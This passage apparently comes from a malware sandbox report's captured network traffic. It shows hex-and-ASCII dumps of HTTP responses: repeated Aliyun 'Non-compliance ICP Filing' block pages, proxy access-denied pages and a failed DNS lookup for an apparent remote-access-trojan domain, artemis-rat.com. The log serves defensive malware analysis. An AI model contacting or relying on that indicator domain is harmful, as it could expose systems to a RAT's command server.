20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:57 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:57 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 33 34 39 39 32 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:34992->1.1.1.1:53: i/o timeout
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:57 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 33 34 39 39 32 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:34992->1.1.1.1:53: i/o timeout
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:57 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=a6a30c38-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:15:00 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
